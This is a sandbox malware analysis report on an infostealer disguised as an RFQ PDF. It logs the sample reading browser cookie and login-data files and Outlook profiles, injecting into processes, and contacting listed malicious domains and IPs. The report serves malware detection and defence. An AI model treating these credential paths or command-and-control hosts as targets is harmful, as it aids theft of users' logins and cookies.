                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 312 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 12 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 312 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 14 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph. ID: 1574079, Sample: RFQ3978 39793980.pdf.exe, Startdate: 12/12/2024, Architecture: WINDOWS, Score: 100. Process chain: RFQ3978 39793980.pdf.exe (started) -> MSBuild.exe (started) -> shazRxxmQwU.exe (injected) -> regini.exe (started) -> shazRxxmQwU.exe (injected) and firefox.exe (started).]

                Source | Detection | Scanner | Label | Link
                RFQ3978 39793980.pdf.exe | 100% | Avira | HEUR/AGEN.1305388 |
                RFQ3978 39793980.pdf.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
www.vayui.top | 104.21.95.160 | true | false | | high
hm35s.top | 154.23.184.95 | true | true | | unknown
www.elitevibes.top | 66.29.149.46 | true | true | | unknown
www.327531.buzz | 43.199.54.158 | true | true | | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
www.cg19g5.pro | 154.88.22.105 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
www.030002350.xyz | 161.97.142.144 | true | true | | unknown
www.hm35s.top | unknown | unknown | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
161.97.142.144 | www.030002350.xyz | United States | 51167 | CONTABODE | true
43.199.54.158 | www.327531.buzz | Japan | 4249 | LILLY-ASUS | true
154.23.184.95 | hm35s.top | United States | 174 | COGENT-174US | true
104.21.95.160 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
154.88.22.105 | www.cg19g5.pro | Seychelles | 40065 | CNSERVERSUS | true
66.29.149.46 | www.elitevibes.top | United States | 19538 | ADVANTAGECOMUS | true
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1574079
                                                                                                            Start date and time:2024-12-12 21:46:00 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 33s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Run name:Run with higher sleep bypass
                                                                                                            Number of analysed new started processes analysed:9
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:RFQ3978 39793980.pdf.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@6/6
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 75%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 91%
                                                                                                            • Number of executed functions: 93
                                                                                                            • Number of non-executed functions: 304
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 199.232.210.172, 13.85.23.206, 192.229.221.95, 13.107.246.63
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • VT rate limit hit for: RFQ3978 39793980.pdf.exe
                                                                                                            No simulations
                                                                                                            • 172.67.145.234
                                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.95.160
                                                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.145.234
                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.95.160
                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.145.234
                                                                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 104.21.95.160
                                                                                                            bg.microsoft.map.fastly.netZiraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 199.232.210.172
                                                                                                            qWMEdD3xsu.dllGet hashmaliciousStrela StealerBrowse
                                                                                                            • 199.232.210.172
                                                                                                            IDqDMIZDPk.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                                            • 199.232.210.172
                                                                                                            9MQYWJVQut.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            Dec_2024 Shipment Packing List.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            s-part-0035.t-0009.t-msedge.netTKuVlZfZngP6kV3.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.63
                                                                                                            SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 13.107.246.63
                                                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            6J523vK0ft.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            8IwJiLDCIR.dllGet hashmaliciousStrela StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            LILLY-ASUSloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 40.8.14.133
                                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.189.184.29
                                                                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.116.24.188
